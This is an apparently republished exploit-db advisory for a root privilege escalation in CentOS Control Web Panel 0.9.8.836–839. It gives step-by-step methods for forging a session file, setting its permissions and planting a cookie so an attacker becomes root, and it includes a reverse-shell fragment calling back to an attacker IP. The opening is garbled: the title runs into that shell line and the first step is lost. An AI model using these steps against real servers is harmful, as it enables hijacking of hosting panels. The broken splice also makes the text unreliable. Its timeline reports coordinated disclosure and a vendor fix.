Exploit/Advisories
Published on July 16th, 2019 📆 | 3777 Views ⚑
0CentOS Control Web Panel 0.9.8.836
//====================================================================
|| ||
|| CWP Control Web Panel 0.9.8.836 - 0.9.8.839 ||
|| Root Privilege Escalation ||
|| ||
====================================================================//
# ====================================================================
# Information
# ====================================================================
# Exploit Title: CWP (CentOS Control Web Panel) & /dev/tcp/[Attacker-IP]/8000 0>&1"
2. Create session file through reverse shell
echo "username|s:4:"root";logged|b:1;rkey|s:20:"[RKEY]";token|s:36:"[TOKEN-KEY]";" > /tmp/sess_123456
3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
4. Change file permission "chmod 664 /tmp/sess_123456"
5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
6. Open the URL and become the root user
#
# Method 2 Uploading via File manager function
#
1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature
2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
4. Open the URL and become the root user
*From step 1 - 4 need doing it quickly. if we do it too slow, the application will change the permission of file sess_123456 to 600, and the file will become 0 byte. If this happened, attacker need to change session file name and repeat the steps again
# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13359.md
# ====================================================================
# Timeline
# ====================================================================
2019-06-30: Discovered the bug
2019-06-30: Reported to vendor
2019-06-30: Vender accepted the vulnerability
2019-07-02: The vulnerability has been fixed
2019-07-06: Published
# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak
https://www.exploit-db.com/exploits/47124
Gloss